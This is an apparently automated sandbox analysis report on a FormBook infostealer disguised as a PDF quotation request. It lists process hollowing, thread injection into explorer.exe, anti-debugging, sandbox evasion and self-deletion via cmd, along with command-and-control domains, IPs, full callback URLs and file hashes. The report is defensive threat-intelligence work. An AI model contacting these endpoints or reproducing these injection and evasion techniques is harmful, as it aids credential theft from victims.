          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0461AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04633B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04633B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0460F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0462DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04634BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_046BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04611B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04611B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_0463B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 10_2_04632397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeCode function: 6_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.afxwn.icu
          Source: C:\Windows\explorer.exe; Domain query: www.weqffg.site
          Source: C:\Windows\explorer.exe; Network Connect: 156.234.12.248 80
          Source: C:\Windows\explorer.exe; Network Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exe; Domain query: www.analytics-at-scale.com
          Source: C:\Windows\explorer.exe; Network Connect: 162.214.233.244 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: EB0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\msdt.exe; Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Process created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Process created: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
          Source: C:\Windows\SysWOW64\msdt.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe"
          Source: explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000000.342217712.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.323174188.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.302058539.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.402407831.0000000000B68000.00000004.00000020.sdmp; Binary or memory string: Progman\Pr
          Source: explorer.exe, 00000007.00000000.329823325.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.303008026.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.342913123.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.323908131.00000000011E0000.00000002.00020000.sdmp, msdt.exe, 0000000A.00000002.568659576.0000000003030000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.350785611.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.334195852.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.312931928.0000000008778000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Rootkit1 | Credential API Hooking1 | Security Software Discovery221 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion31 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection512 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Timestomp1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | File Deletion1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 532838
          Sample: Solicitud urgente de Quotaion_U1197,pdf.exe
          Startdate: 02/12/2021
          Architecture: WINDOWS
          Score: 100

          Signatures on the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

          Process tree (text rendering of the graph image):
          - Solicitud urgente de Quotaion_U1197,pdf.exe (started)
              dropped file: Solicitud urgente ...n_U1197,pdf.exe.log, ASCII
              - Solicitud urgente de Quotaion_U1197,pdf.exe (started)
                  signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  - explorer.exe (injected)
                      DNS/IP: www.afxwn.icu 156.234.12.248, 49833, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles; www.weqffg.site 162.214.233.244, 49785, 80 UNIFIEDLAYER-AS-1US United States; 2 other IPs or domains
                      signature: System process connects to network (likely due to code injection or exploit)
                      - msdt.exe (started)
                          signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                          - cmd.exe (started)
                              - conhost.exe (started)
              - Solicitud urgente de Quotaion_U1197,pdf.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          Solicitud urgente de Quotaion_U1197,pdf.exe | 40% | Virustotal | | Browse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

Source | Detection | Scanner | Label
analytics-at-scale.com | 1% | Virustotal |

          URLs

Source | Detection | Scanner | Label
www.coralxlix.com/c1h5/ | 0% | Avira URL Cloud | safe
http://www.afxwn.icu/c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz | 0% | Avira URL Cloud | safe
http://www.weqffg.site/c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz | 100% | Avira URL Cloud | phishing
http://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz | 0% | Avira URL Cloud | safe
https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.afxwn.icu | 156.234.12.248 | true | true | | unknown
www.weqffg.site | 162.214.233.244 | true | true | | unknown
analytics-at-scale.com | 192.0.78.24 | true | true | | unknown
www.analytics-at-scale.com | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.coralxlix.com/c1h5/ | true | Avira URL Cloud: safe | low
http://www.afxwn.icu/c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz | true | Avira URL Cloud: safe | unknown
http://www.weqffg.site/c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz | true | Avira URL Cloud: phishing | unknown
http://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJ | msdt.exe, 0000000A.00000002.569235088.0000000004FFF000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                Contacted IPs


                Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.24 | analytics-at-scale.com | United States | 2635 | AUTOMATTICUS | true
162.214.233.244 | www.weqffg.site | United States | 46606 | UNIFIEDLAYER-AS-1US | true
156.234.12.248 | www.afxwn.icu | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:532838
                Start date:02.12.2021
                Start time:18:37:09
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 53s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:Solicitud urgente de Quotaion_U1197,pdf.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:23
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@9/1@3/3
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 15% (good quality ratio 13.5%)
                • Quality average: 73.8%
                • Quality standard deviation: 31.1%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information

                Simulations

                Behavior and APIs

Time | Type | Description
18:38:08 | API Interceptor | 1x Sleep call for process: Solicitud urgente de Quotaion_U1197,pdf.exe modified

                Joe Sandbox View / Context

                IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Context

                Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Context

                ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Solicitud urgente de Quotaion_U1197,pdf.exe.log
                Process:C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1310
                Entropy (8bit):5.345651901398759
                Encrypted:false
                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                MD5:D918C6A765EDB90D2A227FE23A3FEC98
                SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                Malicious:true
                Reputation:moderate, very likely benign file
                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.69240335411092
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:Solicitud urgente de Quotaion_U1197,pdf.exe
                File size:456192
                MD5:985db7fdfcf2aa38a0b75c22f06b2756
                SHA1:5f51dec30f3a649fc49e95e3421bc247cf9c40c7
                SHA256:6e4323460316f29ecdaa2b49fbe733c11ea3a040cf7336e177ac9345ddac21c1
                SHA512:469037a46ca39a8540b81bc18016058d170f99ba98707883b3a4c0a1c9a3a4b84fe2f849765b17c7e8387db13ca1d96148abda2a676d688b6b1f0a1c062a063d
                SSDEEP:6144:h3j2kQqvZRHs/KTAva0AfvzIBOU5LrBhtIMiHDrH03S0NJQeEv6si/c5U/TU1zN1:101NBxRrPtIhjrUi+QzRoTU1zNBjf
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.......................J......N.... ........@.. .......................`............@................................

                File Icon

                Icon Hash:94ba3a92e98cb6c8

                Static PE Info

                General

                Entrypoint:0x46c94e
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0xD47F48BF [Mon Dec 21 20:44:47 2082 UTC]
                TLS Callbacks:
                CLR (.Net) Version:v4.0.30319
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al

                Data Directories

